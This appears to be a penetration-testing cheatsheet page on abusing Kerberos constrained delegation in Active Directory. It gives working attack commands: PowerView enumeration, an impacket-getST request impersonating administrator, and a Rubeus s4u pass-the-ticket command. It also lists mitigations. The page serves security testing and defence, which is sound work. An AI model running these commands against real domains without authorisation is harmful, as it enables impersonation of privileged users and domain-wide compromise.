Back to Active Directory

Constrained Delegation

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

Constrained Delegation allows a service to impersonate users to specific destination services. When configured, an attacker who compromises the service account can request TGS tickets for any user to the delegated services, enabling lateral movement.

Constrained delegation abuse is a critical escalation path from service compromise to domain-wide access.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Constrained Delegation:

Get-NetUser -TrustedToAuth (PowerView)
Get-NetComputer -TrustedToAuth (PowerView)
impacket-getST -dc-ip 10.10.10.10 -spn MSSQLSvc/sql.target.local -impersonate administrator domain.local/serviceuser:password
Rubeus.exe s4u /user:svc_account /rc4:<hash> /impersonateuser:Administrator /msdsspn:"MSSQLSvc/sql.target.local" /ptt

Tools & Techniques

Recommended tools for Constrained Delegation:

  • PowerView: identify accounts with constrained delegation
  • Impacket getST: request S4U2Proxy tickets
  • Rubeus s4u: perform S4U impersonation
  • Requires: service account credentials or hash

Prevention & Mitigation

Security recommendations to prevent Constrained Delegation:

  • Use Group Managed Service Accounts (gMSA) for services
  • Restrict delegation to only required services
  • Monitor for unusual TGS requests (Event ID 4769)
  • Use resource-based delegation instead of constrained
  • Limit service account privileges

References

Additional resources: